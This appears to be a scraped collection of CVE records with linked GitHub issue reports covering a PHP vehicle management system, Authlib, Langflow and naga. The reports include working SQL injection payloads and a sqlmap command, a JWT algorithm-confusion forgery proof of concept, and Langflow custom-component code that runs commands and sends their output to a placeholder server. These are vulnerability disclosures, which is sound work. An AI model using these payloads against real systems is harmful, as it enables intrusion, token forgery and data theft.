"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/CveSecLook/cve/issues/44"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267458"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267458"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.352338"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/CveSecLook/cve/issues/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.352338"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/44 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Vehicle Management System in PHP/MySQL 1.0 updatebill.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Vehicle Management System in PHP/MySQL
## Vendor Homepage
+ https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ xuanluansec
## Vulnerable File
+ updatebill.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'updatebill.php' file of the 'Vehicle Management System in PHP/MySQL' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Vehicle Management System in PHP/MySQL" xuanluansec discovered a critical SQL injection vulnerability in the `updatebill.php` file. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'id' parameter
## Payload:
```sql
id=1' AND 6722=(SELECT (CASE WHEN (6722=6722) THEN 6722 ELSE (SELECT 3580 UNION SELECT 3808) END))-- -&salary=1&equipment=1&oil=1&tcost=1
id=1' AND (SELECT 4159 FROM (SELECT(SLEEP(5)))bSHe)-- zHWk&salary=1&equipment=1&oil=1&tcost=1
```
```makefile
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6722=(SELECT (CASE WHEN (6722=6722) THEN 6722 ELSE (SELECT 3580 UNION SELECT 3808) END))-- -&salary=1&equipment=1&oil=1&tcost=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4159 FROM (SELECT(SLEEP(5)))bSHe)-- zHWk&salary=1&equipment=1&oil=1&tcost=1
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://20.20.20.128:8118/updatebill.php" --data="id=1&salary=1&equipment=1&oil=1&tcost=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs
```
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | SourceCodester Vehicle Management System in PHP/MySQL 1.0 updatebill.php SQL injection | https://api.github.com/repos/CveSecLook/cve/issues/44/comments | 0 | 2024-06-08T04:29:27Z | 2024-06-08T04:29:27Z | https://github.com/CveSecLook/cve/issues/44 | 2,341,453,168 | 44 | 6,059 |
CVE-2024-37568 | 2024-06-09T19:15:52.323 | lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.) | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/lepture/authlib/issues/654"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHJI32SN4FNAUVNALVGOKWHNSQ6XS3M5/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZI7HYGN7VZAYFV6UV3SRLYF7QGERXIU/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.vicarius.io/vsociety/posts/algorithm-confusion-in-lepture-authlib-cve-2024-37568"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/lepture/authlib/issues/654"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHJI32SN4FNAUVNALVGOKWHNSQ6XS3M5/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZI7HYGN7VZAYFV6UV3SRLYF7QGERXIU/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.vicarius.io/vsociety/posts/algorithm-confusion-in-lepture-authlib-cve-2024-37568"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*",
"matchCriteriaId": "18E429CB-390E-4F80-B36A-83E930FFDC41",
"versionEndExcluding": "1.3.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"347"
] | 347 | https://github.com/lepture/authlib/issues/654 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"lepture",
"authlib"
] | # Issue description
If the `algorithm` field is left unspecified when calling `jwt.decode`, the library will allow HMAC verification with ANY asymmetric public key. The library does no checks whatsoever to mitigate this. This applies to verification with the algorithms HS256, HS384, and HS512 in lieu of the asymmetric algorithm. This issue is also persistent in [joserfc](https://github.com/authlib/joserfc). This vulnerability is similar to CVE-2022-29217 and CVE-2024-33663, however severity is higher as this applies to ALL verification with asymmetric public keys, regardless of format.
The [Authlib documentation on JWTs](https://docs.authlib.org/en/latest/jose/jwt.html) starts off with a code snippet demonstrating JWT signing and verfication of claims using RSA. The code snippet shown is vulnerable to this issue. The documetation does halfway down the page go on to describe the danger of not checking the algorithm header, however does not adequately press the importance of not doing so, nor does the library implement adequate protections against this.
# Proposed solution
Same solution as for the patch for CVE-2022-29217 and CVE-2024-33663. A thorough, comprehensive check of whether the verifying key is asymmetric, see [here](https://github.com/jpadilla/pyjwt/blob/7b4bc844b9d4c38a8dbba1e727f963611124dd5b/jwt/utils.py#L100). When performing signature verification with HMAC, first check whether the verifying key is not actually a PEM or SSH-encoded asymmetric public key; this is a clear sign of algorithm confusion.
Also make non-usage of the algorithms keyword throw an exception when using the `jwt.decode` method, or at the very least a warning, so that the developer at least knows they are doing something silly by not using it. Alternatively, depricate the method an instead only allow usage of the `JsonWebToken` class, with algorithm as a mandatory parameter and disallow usage of multiple algorithms in a single instance.
# Proof-of-Concept
Here is a simplified Proof-of-Concept using pycryptodome for key generation that illustrates one way this could be exploited
```py
from authlib.jose import jwt
from Crypto.PublicKey import RSA
from Crypto.Hash import HMAC, SHA256
import base64
# ----- SETUP -----
# generate an asymmetric RSA keypair
# !! signing should only be possible with the private key !!
KEY = RSA.generate(2048)
# PUBLIC KEY, AVAILABLE TO USER
# CAN BE RECOVERED THROUGH E.G. PUBKEY RECOVERY WITH TWO SIGNATURES:
# https://crypto.stackexchange.com/questions/26188/rsa-public-key-recovery-from-signatures
# https://github.com/FlorianPicca/JWT-Key-Recovery
PUBKEY = KEY.public_key().export_key(format='PEM')
# Sanity check
PRIVKEY = KEY.export_key(format='PEM')
token = jwt.encode({"alg": "RS256"}, {"pwned":False}, PRIVKEY)
claims = jwt.decode(token, PUBKEY)
assert not claims["pwned"]
# ---- CLIENT SIDE -----
# without knowing the private key, a valid token can be constructed
# YIKES!!
b64 = lambda x:base64.urlsafe_b64encode(x).replace(b'=',b'')
payload = b64(b'{"alg":"HS256"}') + b'.' + b64(b'{"pwned":true}')
hasher = HMAC.new(PUBKEY, digestmod=SHA256)
hasher.update(payload)
evil_token = payload + b'.' + b64(hasher.digest())
print("😈",evil_token)
# ---- SERVER SIDE -----
# verify and decode the token using the public key, as is custom
# algorithm field is left unspecified
# but the library will happily still verify without warning, trusting the user-controlled alg field of the token header
data = jwt.decode(evil_token, PUBKEY)
if data["pwned"]:
print("VULNERABLE")
```
## Disclaimer
As per the security policy, I contacted both the author and Tidelift about this issue in early April of this year. I received a response from Tidelift that they would follow up the issue, however the issue remains unpatched and I have still not heard further from either. As such, I am opening a public issue on this vulnerability. | Algorithm confusion when verifying JSON Web Tokens with asymmetric public keys | https://api.github.com/repos/authlib/authlib/issues/654/comments | 5 | 2024-06-03T13:51:05Z | 2024-06-10T16:40:33Z | https://github.com/authlib/authlib/issues/654 | 2,331,218,331 | 654 | 6,060 |
CVE-2024-37014 | 2024-06-10T20:15:15.213 | Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/langflow-ai/langflow/issues/1973"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/langflow-ai/langflow/issues/1973"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "32795F99-77E1-46F4-ABBF-53A7616F4777",
"versionEndExcluding": null,
"versionEndIncluding": "0.6.19",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/langflow-ai/langflow/issues/1973 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"langflow-ai",
"langflow"
] | **Quick note**
Langflow is a very interesting and useful framework for those who work with AI projects. Personally, it's a cool project to learn from. It seems the Custom Component feature was launched to support user-defined Python scripts that use the Langflow provided library. This is a great feature. However, upon reviewing its documentation in [1] and [2], it seems there is no mention of potential security issues. Hence, perhaps the following finding was likely not expected.
[1] https://docs.langflow.org/components/custom
[2] https://docs.langflow.org/guidelines/custom-component
**Describe the bug**
The Custom Component feature allows users to provide their own Python scripts using the CustomComponent class provided by the Langflow library. This is excellent for local testing and experimentation. However, if the framework is hosted online, it creates a potential security issue where a bad actor can leverage the opportunity to provide arbitrary Python code and gain code execution ability against the hosting server.
**Impacted API**
POST /api/v1/custom_component
**Browser and Version**
- Browser: Tested on Chromium
- Version: 125.0.6422.60 (Official Build) (arm64)
**To Reproduce**
Steps to reproduce the behavior:
1. Create a new project
2. Using `CustomComponent`, within `Component` class, provide the following Python function
```
import subprocess
import base64
def execute_and_send():
# Execute arbitrary system command
result = subprocess.run(['uname', '-a'], capture_output=True, text=True)
if result.stderr:
print("Error:", result.stderr)
return
# Base64 encode the output
encoded_output = base64.b64encode(result.stdout.encode()).decode()
# Make a GET request with the base64 string as a query parameter
url = f"https://your_server/?data={encoded_output}"
response = requests.get(url)
execute_and_send()
```
3. By clicking on `Check & Save`, the `/api/v1/custom_component` API is invoked to process the provided Python script, which then leads to OS command execution. The output will be Base64 encoded and sent to a malicious server.
**Screenshots**
<img width="1876" alt="Screenshot 2024-05-25 at 10 43 43 AM" src="https://github.com/langflow-ai/langflow/assets/21222141/ba8afb97-d6fc-444a-82c5-cf78cb1665f6">
**Additional context**
The vulnerability allows for arbitrary code execution by injecting malicious code through the Custom Component feature. This could lead to significant security risks, including data theft, unauthorized access, and potential disruption of services (especially when being hosted publicly)
| [Security Issue] Code Execution against underlying host system in Custom Component | https://api.github.com/repos/langflow-ai/langflow/issues/1973/comments | 8 | 2024-05-25T15:48:20Z | 2024-08-02T19:56:39Z | https://github.com/langflow-ai/langflow/issues/1973 | 2,317,095,064 | 1,973 | 6,061 |
CVE-2024-36761 | 2024-06-12T16:15:11.983 | naga v0.14.0 was discovered to contain a stack overflow via the component /wgsl/parse/mod.rs. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/MageWeiG/VulnerabilityCollection/blob/main/CVE-2024-36761/info.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gfx-rs/naga/issues/2591"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/MageWeiG/VulnerabilityCollection/blob/main/CVE-2024-36761/info.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gfx-rs/naga/issues/2591"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gfx-rs:naga:0.14.0:*:*:*:*:rust:*:*",
"matchCriteriaId": "78CD5E32-2654-480D-99A6-B5B24501BB0D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gfx-rs/naga/issues/2591 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gfx-rs",
"naga"
] | When I was using oss-fuzz to test the fuzzer wgsl_parser in my project, I found a stack overflow vulnerability that could trigger a crash by typing enough '(' into the fuzzer.
The crash information is as follows:
```
=================================================================
==132416==ERROR: AddressSanitizer: stack-overflow on address 0x7fffadaa5ee0 (pc 0x555b4f7ab900 bp 0x7fffadaa64f0 sp 0x7fffadaa5ee0 T0)
#0 0x555b4f7ab900 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs
#1 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#2 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#3 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#4 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#5 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#6 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#7 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#8 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#9 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#10 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#11 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#12 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#13 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#14 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25
#15 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#16 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17
#17 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#18 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22
#19 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#20 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#21 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#22 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
#23 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62
#24 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#25 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41
#26 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#27 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#28 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#29 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#30 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#31 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#32 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#33 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#34 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#35 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#36 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#37 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#38 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#39 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#40 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25
#41 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#42 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17
#43 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#44 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22
#45 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#46 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#47 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#48 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
